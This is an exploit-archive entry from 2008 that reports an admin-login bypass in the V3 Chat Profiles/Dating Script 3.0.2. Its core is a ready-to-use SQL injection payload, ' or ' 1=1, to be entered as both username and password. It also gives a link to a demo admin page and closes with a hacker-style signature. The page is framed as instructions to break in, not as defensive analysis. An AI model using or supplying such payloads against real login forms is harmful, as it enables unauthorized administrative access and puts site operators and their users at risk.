[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : V3 Chat Profiles/Dating Script 3.0.2 (Auth Bypass) SQL Injection Vuln
# Published : 2008-11-08
# Author : d3b4g
# Previous Title : Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln
# Next Title : ZEEJOBSITE 2.0 Remote File Upload Vulnerability
[~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com
[~]
[~] Risk: High
---------------------------------------------------------------------
Exploit: USe this information to bypass admin login
username: ' or ' 1=1
password: ' or ' 1=1
-----------------------------------------------------------------------
Demo: http://v3chat.com/v3profiles/admin/
[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz
# www.Syue.com [2008-11-08]